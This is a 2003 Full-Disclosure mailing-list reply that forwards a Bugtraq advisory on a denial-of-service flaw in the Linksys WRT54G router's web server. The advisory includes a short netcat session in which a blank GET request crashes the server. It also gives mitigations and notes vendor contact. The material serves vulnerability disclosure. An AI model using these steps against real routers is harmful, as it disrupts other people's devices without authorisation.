[Full-Disclosure] [Fwd: Bugtraq: Linksys WRT54G Denial of Service Vulnerability]
kang at insecure.ws
kang at insecure.ws
Thu Dec 4 12:12:06 GMT 2003
despite being very similar, my WAP54G *isn't* vulnerable
:)
(*Firmware: v1.08, Aug 05, 2003)*
*
*Michael Renzmann wrote:
> Can anyone confirm if technically identical devices such as the
> Buffalo WBR-G54 share this vulnerability?
>
> -------- Original Message --------
> Subject: Linksys WRT54G Denial of Service Vulnerability
> Date: 3 Dec 2003 22:35:26 -0000
> From: <test at techcentric.net>
> To: bugtraq at securityfocus.com
>
>
>
> Linksys WRT54G Denial of Service Vulnerability
>
>
>
>
>
>
>
> System(s)
>
> ===========
>
>
>
> Tested on Linksys WRT54G v1.0 (firmware v 1.42.3)
>
>
>
>
>
> Detail(s)
>
> ===========
>
>
>
> Sending a blank GET request to the router on port 80 (or 8080) halts
> the embedded webserver. This may allow an attacker to force the owner
> to reboot the router, allowing them to gain sensitive information
> during router authentication.
>
>
>
> Exploitation
>
> ============
>
>
>
> user at test:~$ nc 10.0.0.1 80
>
> GET
>
> user at test:~$ nc 10.0.0.1 80
>
> (UNKNOWN) [10.0.0.1] 80 (http) : Connection refused
>
> user at test:~$
>
>
>
> Solution(s)
>
> ============
>
>
>
> - Https service should continue running for remote access.
>
> - Scan for sniffers that might be on the network before rebooting and
> performing any authentication.
>
> - Wait for a vendor patch :)
>
>
>
> Status
>
> ============
>
>
>
> Vendor contacted on 12/03/03.
>
>
>
>
>
> !HAPPY HOLIDAYS!
>
> carbon at techcentric.net - 12/02/03
>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
Full-Disclosure is hosted and sponsored by Secunia.